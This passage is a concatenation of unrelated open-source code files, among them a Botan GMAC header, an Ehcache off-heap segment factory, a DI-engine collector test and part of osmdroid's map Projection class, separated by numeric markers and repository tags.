List<Resources.StyledString.Span> spanStack = new ArrayList<>(spanList.size()); int offset = 0; for (int i = 0; i <= styledStringMsg.getSpanCount(); i++) { int oldOffset = offset; Resources.StyledString.Span spanMsg; if (i < styledStringMsg.getSpanCount()) { spanMsg = styledStringMsg.getSpan(i); offset = spanMsg.getFirstChar(); } else { spanMsg = null; offset = text.length(); } // Check if there are any tags that need to be closed. while (!spanStack.isEmpty() && spanStack.get(spanStack.size() - 1).getLastChar() < offset) { Resources.StyledString.Span span = spanStack.remove(spanStack.size() - 1); int spanEnd = span.getLastChar() + 1; if (spanEnd > oldOffset) { XmlUtils.appendXmlTextValue(xmlValue, text, oldOffset, spanEnd); oldOffset = spanEnd; } String tagText = span.getTag(); int tagEnd = indexOfOrEnd(tagText, ';', 0); // Write the closing tag. xmlValue.append("</").append(tagText, 0, tagEnd).append('>'); } if (offset >= oldOffset) { // Copy text between tags. XmlUtils.appendXmlTextValue(xmlValue, text, oldOffset, offset); // Start a new tag. if (spanMsg != null) { String tagText = spanMsg.getTag(); int pos = indexOfOrEnd(tagText, ';', 0); if (pos != 0) { spanStack.add(spanMsg); xmlValue.append('<').append(tagText, 0, pos); while (pos < tagText.length()) { pos++; int nextPos = indexOfOrEnd(tagText, ';', pos); int nameEnd = tagText.indexOf('=', pos); if (nameEnd > pos && nameEnd < nextPos) { xmlValue.append(' '); xmlValue.append(tagText, pos, nameEnd + 1); xmlValue.append('"'); // Attribute values in the proto message are not escaped. Append with escaping. XmlUtils.appendXmlAttributeValue(xmlValue, tagText, nameEnd + 1, nextPos); xmlValue.append('"'); } pos = nextPos; } xmlValue.append('>'); } } } } return xmlValue.toString(); } private static int indexOfOrEnd(@NotNull String str, char ch, int fromIndex) { int index = str.indexOf(ch, fromIndex); return index >= 0 ? index : str.length(); } /** Do not instantiate. All methods are static. */ private ProtoStyledStringDecoder() {} }
1,580
5,411
<reponame>thorium-cfx/fivem /* * GMAC * (C) 2016 <NAME>, <NAME> * (C) 2017 <NAME> * * Botan is released under the Simplified BSD License (see license.txt) */ #ifndef BOTAN_GMAC_H_ #define BOTAN_GMAC_H_ #include <botan/mac.h> BOTAN_FUTURE_INTERNAL_HEADER(gmac.h) namespace Botan { class BlockCipher; class GHASH; /** * GMAC * * GMAC requires a unique initialization vector be used for each message. * This must be provided via the MessageAuthenticationCode::start() API */ class BOTAN_PUBLIC_API(2,0) GMAC final : public MessageAuthenticationCode { public: void clear() override; std::string name() const override; size_t output_length() const override; MessageAuthenticationCode* clone() const override; Key_Length_Specification key_spec() const override; /** * Creates a new GMAC instance. * * @param cipher the underlying block cipher to use */ explicit GMAC(BlockCipher* cipher); GMAC(const GMAC&) = delete; GMAC& operator=(const GMAC&) = delete; ~GMAC(); private: void add_data(const uint8_t[], size_t) override; void final_result(uint8_t[]) override; void start_msg(const uint8_t nonce[], size_t nonce_len) override; void key_schedule(const uint8_t key[], size_t size) override; static const size_t GCM_BS = 16; std::unique_ptr<BlockCipher> m_cipher; std::unique_ptr<GHASH> m_ghash; secure_vector<uint8_t> m_aad_buf; size_t m_aad_buf_pos; bool m_initialized; }; } #endif
635
317
############################################################################## # # include makefile for nmake under Windows NT # ############################################################################## # # $Id$ # # # If NWCHEM_TOP_WIN32 is set, take it. Otherwise, if NWCHEM_TOP is set, # use that. One of the two must be set, however. # !IFNDEF NWCHEM_TOP_WIN32 !IFDEF NWCHEM_TOP NWCHEM_TOP_WIN32 = $(NWCHEM_TOP) !ELSE !MESSAGE You must define NWCHEM_TOP in your environment to be the path !MESSAGE of the top level nwchem directory in DOS format ... e.g. !MESSAGE NWCHEM_TOP="D:\PNNL\nwchem" !MESSAGE !ERROR NWCHEM_TOP not set. !ENDIF !ENDIF TOPDIR = $(NWCHEM_TOP_WIN32) SRCDIR = $(TOPDIR)\src # Set LIB_DIR externally to override library dir name under $(TOPDIR)\lib !IFDEF LIB_DIR LIBDIR = $(TOPDIR)\lib\$(LIB_DIR) !ELSE LIBDIR = $(TOPDIR)\lib\win32 !ENDIF # !!! This is called LIB_DISTRIB in prev NT makefiles LIB_DISTRIB = $(LIBDIR) BINDIR = $(TOPDIR)\bin\win32 INCDIR = $(TOPDIR)\src\include CNFDIR = $(TOPDIR)\src\config OBJDIR = .\obj GLOB_DEFINES =-DWIN32 -DUSE_FCD DEFINES = $(GLOB_DEFINES) $(LIB_DEFINES) GLOB_INCLUDES= -I"$(SRCDIR)\include" -I"$(SRCDIR)\tools\include" INCLUDES = $(GLOB_INCLUDES) $(LIB_INCLUDES) #AR = link.exe -lib -nologo AR = lib -nologo ARFLAGS = /out:$(LIBRARY_PATH) CC = cl -nologo FC = f90 -nologo !IFDEF NWDEBUG COPT = -Z7 FOPT = /debug:full /nooptimize !ELSE COPT = FOPT = /fast /optimize:5 /noinline /nofltconsistency # Added /noinline since it breaks LAPACK dlamach routines !ENDIF CFLAGS = -W3 $(COPT) $(INCLUDES) $(DEFINES) -Fo"$(OBJDIR)/" -c FFLAGS = $(FOPT) $(INCLUDES) $(DEFINES) /automatic /check:none /traceback /fpscomp=nogeneral /warn:argument_checking /warn:nofileopt /warn:nouncalled /object:"$(OBJDIR)/" /fpp:"/c /m" /nodefine /nokeep -c .SUFFIXES: .SUFFIXES: .obj .s .F .c .c{$(OBJDIR)}.obj: $(CC) $(CFLAGS) $< .F{$(OBJDIR)}.obj: $(FC) $(FFLAGS) $<
816
711
package com.java110.dto.feeManualCollectionDetail; import com.java110.dto.PageDto; import java.io.Serializable; import java.util.Date; /** * @ClassName FloorDto * @Description 托收明细数据层封装 * @Author wuxw * @Date 2019/4/24 8:52 * @Version 1.0 * add by wuxw 2019/4/24 **/ public class FeeManualCollectionDetailDto extends PageDto implements Serializable { //1010 托收中,2020 已缴费 3030 作废 public static final String STATE_COLLECTION = "1010"; public static final String STATE_PAY_FEE = "2020"; public static final String STATE_DELETE = "3030"; private String amount; private String feeName; private String detailId; private String startTime; private String endTime; private String state; private String stateName; private String communityId; private String collectionId; private String feeId; private String configId; private Date createTime; private String statusCd = "0"; public String getAmount() { return amount; } public void setAmount(String amount) { this.amount = amount; } public String getFeeName() { return feeName; } public void setFeeName(String feeName) { this.feeName = feeName; } public String getDetailId() { return detailId; } public void setDetailId(String detailId) { this.detailId = detailId; } public String getStartTime() { return startTime; } public void setStartTime(String startTime) { this.startTime = startTime; } public String getEndTime() { return endTime; } public void setEndTime(String endTime) { this.endTime = endTime; } public String getState() { return state; } public void setState(String state) { this.state = state; } public String getCommunityId() { return communityId; } public void setCommunityId(String communityId) { this.communityId = communityId; } public String getCollectionId() { return collectionId; } public void setCollectionId(String collectionId) { this.collectionId = collectionId; } public String getFeeId() { return feeId; } public void setFeeId(String feeId) { this.feeId = feeId; } public Date getCreateTime() { return createTime; } public void setCreateTime(Date createTime) { this.createTime = createTime; } public String getStatusCd() { return statusCd; } public void setStatusCd(String statusCd) { this.statusCd = statusCd; } public String getStateName() { return stateName; } public void setStateName(String stateName) { this.stateName = stateName; } public String getConfigId() { return configId; } public void setConfigId(String configId) { this.configId = configId; } }
1,191
474
<reponame>sidia-dev-team/GearVRf /* * Copyright 2016 Samsung Electronics Co., LTD * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.gearvrf.wearconstants; import android.os.Build.VERSION; import android.os.Build.VERSION_CODES; import android.view.MotionEvent; import java.io.Serializable; import java.nio.ByteBuffer; public class TouchEvent implements Serializable { public static final int BYTE_BUFFER_SIZE = 28; int action; long downTime; long eventTime; float x; float y; public TouchEvent(int action, long downTime, long eventTime, float x, float y) { this.action = action; this.downTime = downTime; this.eventTime = eventTime; this.x = x; this.y = y; } public TouchEvent(byte[] bytes) { ByteBuffer buffer = ByteBuffer.wrap(bytes); action = buffer.getInt(); downTime = buffer.getLong(); eventTime = buffer.getLong(); x = buffer.getFloat(); y = buffer.getFloat(); } public byte[] toBytes() { ByteBuffer buffer = ByteBuffer.allocate(BYTE_BUFFER_SIZE); buffer.putInt(action); buffer.putLong(downTime); buffer.putLong(eventTime); buffer.putFloat(x); buffer.putFloat(y); return buffer.array(); } public long getDownTime() { return downTime; } public long getEventTime() { return eventTime; } public int getAction() { return action; } public float getX() { return x; } public float getY() { return y; } public String toString() { StringBuilder builder = new StringBuilder(30); if (VERSION.SDK_INT >= VERSION_CODES.KITKAT) { builder.append(MotionEvent.actionToString(action)); } else { builder.append(action); } builder.append(", X=").append(String.format("%.2f", x)).append(", Y=").append(String .format("%.2f", y)); return builder.toString(); } }
998
14,668
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_MEDIA_WEBRTC_DESKTOP_MEDIA_LIST_OBSERVER_H_ #define CHROME_BROWSER_MEDIA_WEBRTC_DESKTOP_MEDIA_LIST_OBSERVER_H_ class DesktopMediaList; // Interface implemented by the desktop media picker dialog to receive // notifications about changes in DesktopMediaList. class DesktopMediaListObserver { public: virtual void OnSourceAdded(int index) = 0; virtual void OnSourceRemoved(int index) = 0; virtual void OnSourceMoved(int old_index, int new_index) = 0; virtual void OnSourceNameChanged(int index) = 0; virtual void OnSourceThumbnailChanged(int index) = 0; virtual void OnSourcePreviewChanged(size_t index) = 0; protected: virtual ~DesktopMediaListObserver() {} }; #endif // CHROME_BROWSER_MEDIA_WEBRTC_DESKTOP_MEDIA_LIST_OBSERVER_H_
301
676
<filename>app/src/main/java/com/alorma/github/injector/module/NotificationsModule.java<gh_stars>100-1000 package com.alorma.github.injector.module; import android.content.Context; import com.alorma.github.injector.scope.NotificationsScope; import com.alorma.github.notifications.AlarmManagerJobManager; import com.alorma.github.notifications.AppJobManager; import com.alorma.github.notifications.AppNotificationsManager; import com.alorma.github.notifications.AppNotificationsManagerImpl; import dagger.Module; import dagger.Provides; import javax.inject.Named; @Module public class NotificationsModule { @Provides @NotificationsScope @Named("AlarmManagerNotificationsJobManager") AppJobManager getJobManager(Context context) { return new AlarmManagerJobManager(context); } @Provides @NotificationsScope AppNotificationsManager getNotificationsManager(Context context, @Named("AlarmManagerNotificationsJobManager") AppJobManager jobManager) { return new AppNotificationsManagerImpl(context, jobManager); } }
313
464
<reponame>sailxjx/DI-engine import pytest from ding.worker import EpisodeSerialCollector from ding.envs import BaseEnvManager, SyncSubprocessEnvManager, AsyncSubprocessEnvManager from ding.policy import DQNPolicy from ding.model import DQN from dizoo.classic_control.cartpole.envs import CartPoleEnv @pytest.mark.unittest @pytest.mark.parametrize('env_manager_type', [BaseEnvManager, SyncSubprocessEnvManager]) def test_collect(env_manager_type): env = env_manager_type([lambda: CartPoleEnv({}) for _ in range(8)], env_manager_type.default_config()) env.seed(0) model = DQN(obs_shape=4, action_shape=1) policy = DQNPolicy(DQNPolicy.default_config(), model=model).collect_mode collector = EpisodeSerialCollector(EpisodeSerialCollector.default_config(), env, policy) collected_episode = collector.collect( n_episode=18, train_iter=collector._collect_print_freq, policy_kwargs={'eps': 0.5} ) assert len(collected_episode) == 18 assert all([e[-1]['done'] for e in collected_episode]) assert all([len(c) == 0 for c in collector._traj_buffer.values()])
390
6,831
<reponame>ajayiagbebaku/NFL-Model from ..plugin_registry import PluginRegistry from typing import Callable class TypedCallableRegistry(PluginRegistry[Callable[[int], int]]): pass class GeneralCallableRegistry(PluginRegistry): _global_settings = {"global_setting": None} @property def global_setting(self): return self._global_settings["global_setting"] @global_setting.setter def global_setting(self, val): self._global_settings["global_setting"] = val def test_plugin_registry(): plugins = TypedCallableRegistry() assert plugins.names() == [] assert plugins.active == "" assert plugins.get() is None assert repr(plugins) == "TypedCallableRegistry(active='', registered=[])" plugins.register("new_plugin", lambda x: x ** 2) assert plugins.names() == ["new_plugin"] assert plugins.active == "" assert plugins.get() is None assert repr(plugins) == ( "TypedCallableRegistry(active='', " "registered=['new_plugin'])" ) plugins.enable("new_plugin") assert plugins.names() == ["new_plugin"] assert plugins.active == "new_plugin" assert plugins.get()(3) == 9 assert repr(plugins) == ( "TypedCallableRegistry(active='new_plugin', " "registered=['new_plugin'])" ) def test_plugin_registry_extra_options(): plugins = GeneralCallableRegistry() plugins.register("metadata_plugin", lambda x, p=2: x ** p) plugins.enable("metadata_plugin") assert plugins.get()(3) == 9 plugins.enable("metadata_plugin", p=3) assert plugins.active == "metadata_plugin" assert plugins.get()(3) == 27 # enabling without changing name plugins.enable(p=2) assert plugins.active == "metadata_plugin" assert plugins.get()(3) == 9 def test_plugin_registry_global_settings(): plugins = GeneralCallableRegistry() # we need some default plugin, but we won't do anything with it plugins.register("default", lambda x: x) plugins.enable("default") # default value of the global flag assert plugins.global_setting is None # enabling changes the global state, not the options plugins.enable(global_setting=True) assert plugins.global_setting is True assert plugins._options == {} # context manager changes global state temporarily with plugins.enable(global_setting="temp"): assert plugins.global_setting == "temp" assert plugins._options == {} assert plugins.global_setting is True assert plugins._options == {} def test_plugin_registry_context(): plugins = GeneralCallableRegistry() plugins.register("default", lambda x, p=2: x ** p) # At first there is no plugin enabled assert plugins.active == "" assert plugins.options == {} # Make sure the context is set and reset correctly with plugins.enable("default", p=6): assert plugins.active == "default" assert plugins.options == {"p": 6} assert plugins.active == "" assert plugins.options == {} # Make sure the context is reset even if there is an error try: with plugins.enable("default", p=6): assert plugins.active == "default" assert plugins.options == {"p": 6} raise ValueError() except ValueError: pass assert plugins.active == "" assert plugins.options == {} # Enabling without specifying name uses current name plugins.enable("default", p=2) with plugins.enable(p=6): assert plugins.active == "default" assert plugins.options == {"p": 6} assert plugins.active == "default" assert plugins.options == {"p": 2}
1,244
1,900
/* * Copyright Terracotta, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.ehcache.impl.internal.store.offheap.factories; import org.ehcache.core.spi.store.Store; import org.ehcache.impl.internal.store.offheap.SwitchableEvictionAdvisor; import org.terracotta.offheapstore.Metadata; import org.terracotta.offheapstore.ReadWriteLockedOffHeapClockCache; import org.terracotta.offheapstore.paging.PageSource; import org.terracotta.offheapstore.pinning.PinnableSegment; import org.terracotta.offheapstore.storage.StorageEngine; import org.terracotta.offheapstore.util.Factory; import java.nio.IntBuffer; import java.util.Iterator; import java.util.Set; import java.util.concurrent.locks.Lock; /** * EhcacheSegmentFactory */ public class EhcacheSegmentFactory<K, V> implements Factory<PinnableSegment<K, V>> { private final Factory<? extends StorageEngine<? super K, ? super V>> storageEngineFactory; private final PageSource tableSource; private final int tableSize; private final SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor; private final EhcacheSegment.EvictionListener<K, V> evictionListener; public EhcacheSegmentFactory(PageSource source, Factory<? extends StorageEngine<? super K, ? super V>> storageEngineFactory, int initialTableSize, SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor, EhcacheSegment.EvictionListener<K, V> evictionListener) { this.storageEngineFactory = storageEngineFactory; this.tableSource = source; this.tableSize = initialTableSize; this.evictionAdvisor = evictionAdvisor; this.evictionListener = evictionListener; } public PinnableSegment<K, V> newInstance() { StorageEngine<? super K, ? super V> storageEngine = storageEngineFactory.newInstance(); try { return new EhcacheSegment<>(tableSource, storageEngine, tableSize, evictionAdvisor, evictionListener); } catch (RuntimeException e) { storageEngine.destroy(); throw e; } } public static class EhcacheSegment<K, V> extends ReadWriteLockedOffHeapClockCache<K, V> { public static final int ADVISED_AGAINST_EVICTION = 1 << (Integer.SIZE - 3); private final SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor; private final EvictionListener<K, V> evictionListener; EhcacheSegment(PageSource source, StorageEngine<? super K, ? super V> storageEngine, int tableSize, SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor, EvictionListener<K, V> evictionListener) { super(source, true, storageEngine, tableSize); this.evictionAdvisor = evictionAdvisor; this.evictionListener = evictionListener; } @Override public V put(K key, V value) { int metadata = getEvictionAdviceStatus(key, value); return put(key, value, metadata); } private int getEvictionAdviceStatus(final K key, final V value) { return evictionAdvisor.adviseAgainstEviction(key, value) ? ADVISED_AGAINST_EVICTION : 0; } @Override public V putPinned(K key, V value) { int metadata = getEvictionAdviceStatus(key, value) | Metadata.PINNED; return put(key, value, metadata); } @Override protected boolean evictable(int status) { return super.evictable(status) && (((status & ADVISED_AGAINST_EVICTION) == 0) || !evictionAdvisor.isSwitchedOn()); } @Override public boolean evict(int index, boolean shrink) { Lock lock = writeLock(); lock.lock(); try { Entry<K, V> entry = getEntryAtTableOffset(index); boolean evicted = super.evict(index, shrink); if (evicted) { evictionListener.onEviction(entry.getKey(), entry.getValue()); } return evicted; } finally { lock.unlock(); } } @Override protected Set<Entry<K, V>> createEntrySet() { return new EntrySet(); } public interface EvictionListener<K, V> { void onEviction(K key, V value); } private class EntrySet extends LockedEntrySet { @Override public Iterator<Entry<K, V>> iterator() { readLock().lock(); try { return new LockedEntryIterator() { @Override protected Entry<K, V> create(IntBuffer entry) { Entry<K, V> entryObject = super.create(entry); ((Store.ValueHolder<?>) entryObject.getValue()).get(); return entryObject; } }; } finally { readLock().unlock(); } } } } }
1,772
2,291
package org.osmdroid.views; import android.graphics.Canvas; import android.graphics.Matrix; import android.graphics.Point; import android.graphics.PointF; import android.graphics.Rect; import org.osmdroid.api.IGeoPoint; import org.osmdroid.api.IProjection; import org.osmdroid.util.BoundingBox; import org.osmdroid.util.GeoPoint; import org.osmdroid.util.GeometryMath; import org.osmdroid.util.PointL; import org.osmdroid.util.RectL; import org.osmdroid.util.TileSystem; /** * A Projection serves to translate between the coordinate system of x/y on-screen pixel coordinates * and that of latitude/longitude points on the surface of the earth. You obtain a Projection from * MapView.getProjection(). You should not hold on to this object for more than one draw, since the * projection of the map could change. <br> * <br>Uses the web mercator projection * <b>Note:</b> This class will "wrap" all pixel and lat/long values that overflow their bounds * (rather than clamping to their bounds). * * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> */ public class Projection implements IProjection { /** * The size in pixels of a VERY large map, the "projected" map. * For optimization purpose, we may compute only once the projection of the GeoPoints * on this large map, and then just divide in order to get the projection on a corresponding * smaller map / smaller zoom */ public static final double mProjectedMapSize = 1L << 60; private long mOffsetX; private long mOffsetY; private long mScrollX; private long mScrollY; private final Matrix mRotateAndScaleMatrix = new Matrix(); private final Matrix mUnrotateAndScaleMatrix = new Matrix(); private final float[] mRotateScalePoints = new float[2]; private final BoundingBox mBoundingBoxProjection = new BoundingBox(); private final double mZoomLevelProjection; private final Rect mScreenRectProjection = new Rect(); private final Rect mIntrinsicScreenRectProjection; private boolean horizontalWrapEnabled; private boolean verticalWrapEnabled; private final double mMercatorMapSize; private final double mTileSize; private final float mOrientation; private final GeoPoint mCurrentCenter = new GeoPoint(0., 0); private final TileSystem mTileSystem; /** * @since 6.1.1 */ private final int mMapCenterOffsetX; private final int mMapCenterOffsetY; Projection(MapView mapView) { this( mapView.getZoomLevelDouble(), mapView.getIntrinsicScreenRect(null), mapView.getExpectedCenter(), mapView.getMapScrollX(), mapView.getMapScrollY(), mapView.getMapOrientation(), mapView.isHorizontalMapRepetitionEnabled(), mapView.isVerticalMapRepetitionEnabled(), MapView.getTileSystem(), mapView.getMapCenterOffsetX(), mapView.getMapCenterOffsetY()); } /** * @since 6.0.0 */ public Projection( final double pZoomLevel, final Rect pScreenRect, final GeoPoint pCenter, final long pScrollX, final long pScrollY, final float pOrientation, final boolean pHorizontalWrapEnabled, final boolean pVerticalWrapEnabled, final TileSystem pTileSystem, final int pMapCenterOffsetX, final int pMapCenterOffsetY) { mMapCenterOffsetX = pMapCenterOffsetX; mMapCenterOffsetY = pMapCenterOffsetY; mZoomLevelProjection = pZoomLevel; horizontalWrapEnabled = pHorizontalWrapEnabled; verticalWrapEnabled = pVerticalWrapEnabled; mTileSystem = pTileSystem; mMercatorMapSize = TileSystem.MapSize(mZoomLevelProjection); mTileSize = TileSystem.getTileSize(mZoomLevelProjection); mIntrinsicScreenRectProjection = pScreenRect; final GeoPoint center = pCenter != null ? pCenter : new GeoPoint(0., 0); mScrollX = pScrollX; mScrollY = pScrollY; mOffsetX = getScreenCenterX() - mScrollX - mTileSystem.getMercatorXFromLongitude(center.getLongitude(), mMercatorMapSize, this.horizontalWrapEnabled); mOffsetY = getScreenCenterY() - mScrollY - mTileSystem.getMercatorYFromLatitude(center.getLatitude(), mMercatorMapSize, this.verticalWrapEnabled); mOrientation = pOrientation; mRotateAndScaleMatrix.preRotate(mOrientation, getScreenCenterX(), getScreenCenterY()); mRotateAndScaleMatrix.invert(mUnrotateAndScaleMatrix); refresh(); } /** * @since 6.1.0 */ public Projection( final double pZoomLevel, final int pWidth, final int pHeight, final GeoPoint pCenter, final float pOrientation, final boolean pHorizontalWrapEnabled, final boolean pVerticalWrapEnabled, final int pMapCenterOffsetX, final int pMapCenterOffsetY) { this( pZoomLevel, new Rect(0, 0, pWidth, pHeight), pCenter, 0, 0, pOrientation, pHorizontalWrapEnabled, pVerticalWrapEnabled, MapView.getTileSystem(), pMapCenterOffsetX, pMapCenterOffsetY); } /** * @since 6.0.0 */ public Projection getOffspring(final double pZoomLevel, final Rect pScreenRect) { return new Projection( pZoomLevel, pScreenRect, mCurrentCenter, 0, 0, mOrientation, horizontalWrapEnabled, verticalWrapEnabled, mTileSystem, 0, 0); // 0 looks like the most relevant value } public double getZoomLevel() { return mZoomLevelProjection; } public BoundingBox getBoundingBox() { return mBoundingBoxProjection; } public Rect getScreenRect() { return mScreenRectProjection; } public Rect getIntrinsicScreenRect() { return mIntrinsicScreenRectProjection; } @Override public IGeoPoint fromPixels(int x, int y) { return fromPixels(x, y, null, false); } /** * note: if {@link MapView#setHorizontalMapRepetitionEnabled(boolean)} or * {@link MapView#setVerticalMapRepetitionEnabled(boolean)} is false, then this * can return values that beyond the max extents of the world. This may or may not be * desired. <a href="https://github.com/osmdroid/osmdroid/pull/722">https://github.com/osmdroid/osmdroid/pull/722</a> * for more information and the discussion associated with this. * * @param pPixelX * @param pPixelY * @param pReuse * @return */ public IGeoPoint fromPixels(final int pPixelX, final int pPixelY, final GeoPoint pReuse) { return fromPixels(pPixelX, pPixelY, pReuse, false); } /** * * note: if {@link MapView#setHorizontalMapRepetitionEnabled(boolean)} or * {@link MapView#setVerticalMapRepetitionEnabled(boolean)} is false, then this * can return values that beyond the max extents of the world. This may or may not be * desired. <a href="https://github.com/osmdroid/osmdroid/pull/722">https://github.com/osmdroid/osmdroid/pull/722</a> * for more information and the discussion associated with this. * * @param pPixelX * @param pPixelY * @param pReuse * @param forceWrap * @return */ public IGeoPoint fromPixels(final int pPixelX, final int pPixelY, final GeoPoint pReuse, boolean forceWrap) { //reverting https://github.com/osmdroid/osmdroid/issues/459 //due to relapse of https://github.com/osmdroid/osmdroid/issues/507 //reverted functionality is now on the method fromPixelsRotationSensitive return mTileSystem.getGeoFromMercator(getCleanMercator(getMercatorXFromPixel(pPixelX), horizontalWrapEnabled), getCleanMercator(getMercatorYFromPixel(pPixelY), verticalWrapEnabled), mMercatorMapSize, pReuse, horizontalWrapEnabled || forceWrap, verticalWrapEnabled || forceWrap); } @Override public Point toPixels(final IGeoPoint in, final Point reuse) { return toPixels(in, reuse, false); } public Point toPixels(final IGeoPoint in, final Point reuse, boolean forceWrap) { final Point out = reuse != null ? reuse : new Point(); out.x = TileSystem.truncateToInt(getLongPixelXFromLongitude(in.getLongitude(), forceWrap)); out.y = TileSystem.truncateToInt(getLongPixelYFromLatitude(in.getLatitude(), forceWrap)); return out; } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelXFromLongitude(final double pLongitude, boolean forceWrap) { return getLongPixelXFromMercator(mTileSystem.getMercatorXFromLongitude(pLongitude, mMercatorMapSize, horizontalWrapEnabled || forceWrap), horizontalWrapEnabled); } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelXFromLongitude(final double pLongitude) { return getLongPixelXFromMercator(mTileSystem.getMercatorXFromLongitude(pLongitude, mMercatorMapSize, false), false); } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelYFromLatitude(final double pLatitude, boolean forceWrap) { return getLongPixelYFromMercator(mTileSystem.getMercatorYFromLatitude(pLatitude, mMercatorMapSize, verticalWrapEnabled || forceWrap), verticalWrapEnabled); } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelYFromLatitude(final double pLatitude) { return getLongPixelYFromMercator(mTileSystem.getMercatorYFromLatitude(pLatitude, mMercatorMapSize, false), false); } /** * A wrapper for {@link #toProjectedPixels(double, double, PointL)} */ public PointL toProjectedPixels(final GeoPoint geoPoint, final PointL reuse) { return toProjectedPixels(geoPoint.getLatitude(), geoPoint.getLongitude(), reuse); } /** * Performs only the first computationally heavy part of the projection. Call * {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} to get the final position. * * @param latituteE6 the latitute of the point * @param longitudeE6 the longitude of the point * @param reuse just pass null if you do not have a PointL to be 'recycled'. * @return intermediate value to be stored and passed to toMapPixelsTranslated. * @deprecated Use {@link #toProjectedPixels(double, double, PointL)} instead */ @Deprecated public PointL toProjectedPixels(final long latituteE6, final long longitudeE6, final PointL reuse) { return toProjectedPixels(latituteE6 * 1E-6, longitudeE6 * 1E-6, reuse); } /** * Performs only the first computationally heavy part of the projection. Call * {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} to get the final position. * * @param latitude the latitute of the point * @param longitude the longitude of the point * @param reuse just pass null if you do not have a PointL to be 'recycled'. * @return intermediate value to be stored and passed to toMapPixelsTranslated. */ public PointL toProjectedPixels(final double latitude, final double longitude, final PointL reuse) { return toProjectedPixels(latitude, longitude, true, reuse); } /** * @since 6.0.0 */ public PointL toProjectedPixels(final double latitude, final double longitude, final boolean pWrapEnabled, final PointL reuse) { return mTileSystem.getMercatorFromGeo(latitude, longitude, mProjectedMapSize, reuse, pWrapEnabled); } /** * Performs the second computationally light part of the projection. * * @param in the PointL calculated by the {@link #toProjectedPixels(double, double, PointL)} * @param reuse just pass null if you do not have a Point to be 'recycled'. * @return the Point containing the coordinates of the initial GeoPoint passed to the * {@link #toProjectedPixels(double, double, PointL)}. * @deprecated Use {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} instead */ @Deprecated public Point toPixelsFromProjected(final PointL in, final Point reuse) { final Point out = reuse != null ? reuse : new Point(); final double power = getProjectedPowerDifference(); final PointL tmp = new PointL(); getLongPixelsFromProjected(in, power, true, tmp); out.x = TileSystem.truncateToInt(tmp.x); out.y = TileSystem.truncateToInt(tmp.y); return out; } /** * @deprecated Use {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} instead */ @Deprecated public Point toPixelsFromMercator(final long pMercatorX, final long pMercatorY, final Point reuse) { final Point out = reuse != null ? reuse : new Point(); out.x = TileSystem.truncateToInt(getLongPixelXFromMercator(pMercatorX, true)); out.y = TileSystem.truncateToInt(getLongPixelYFromMercator(pMercatorY, true)); return out; } public PointL toMercatorPixels(final int pPixelX, final int pPixelY, final PointL reuse) { final PointL out = reuse != null ? reuse : new PointL(); out.x = getCleanMercator(getMercatorXFromPixel(pPixelX), horizontalWrapEnabled); out.y = getCleanMercator(getMercatorYFromPixel(pPixelY), verticalWrapEnabled); return out; } @Override public float metersToEquatorPixels(final float meters) { return metersToPixels(meters, 0, mZoomLevelProjection); } /** * Converts a distance in meters to one in (horizontal) pixels at the current zoomlevel and at * the current latitude at the center of the screen. * * @param meters the distance in meters * @return The number of pixels corresponding to the distance, if measured at the center of the * screen, at the current zoom level. The return value may only be approximate. */ public float metersToPixels(final float meters) { return metersToPixels(meters, getBoundingBox().getCenterWithDateLine().getLatitude(), mZoomLevelProjection); } /** * @since 6.0 */ public float metersToPixels(final float meters, final double latitude, final double zoomLevel) { return (float) (meters / TileSystem.GroundResolution(latitude, zoomLevel)); } @Override public IGeoPoint getNorthEast() { return fromPixels(mIntrinsicScreenRectProjection.right, mIntrinsicScreenRectProjection.top, null, true); } @Override public IGeoPoint getSouthWest() { return fromPixels(mIntrinsicScreenRectProjection.left, mIntrinsicScreenRectProjection.bottom, null, true); } /** * This will provide a Matrix that will revert the current map's scaling and rotation. This can * be useful when drawing to a fixed location on the screen. */ public Matrix getInvertedScaleRotateCanvasMatrix() { return mUnrotateAndScaleMatrix; } /** * This will revert the current map's scaling and rotation for a point. This can be useful when * drawing to a fixed location on the screen. */ public Point unrotateAndScalePoint(int x, int y, Point reuse) { return applyMatrixToPoint(x, y, reuse, mUnrotateAndScaleMatrix, mOrientation != 0); } /** * This will apply the current map's scaling and rotation for a point. This can be useful when * converting MotionEvents to a screen point. */ public Point rotateAndScalePoint(int x, int y, Point reuse) { return applyMatrixToPoint(x, y, reuse, mRotateAndScaleMatrix, mOrientation != 0); } /** * @since 6.0.0 */ private Point applyMatrixToPoint(final int pX, final int pY, final Point reuse, final Matrix pMatrix, final boolean pCondition) { final Point out = reuse != null ? reuse : new Point(); if (pCondition) { mRotateScalePoints[0] = pX; mRotateScalePoints[1] = pY; pMatrix.mapPoints(mRotateScalePoints); out.x = (int) mRotateScalePoints[0]; out.y = (int) mRotateScalePoints[1]; } else { out.x = pX; out.y = pY; } return out; } /** * @since 5.6 */ public void detach() { } /** * @since 6.0.0 */ public Rect getPixelFromTile(final int pTileX, final int pTileY, final Rect pReuse) { final Rect out = pReuse != null 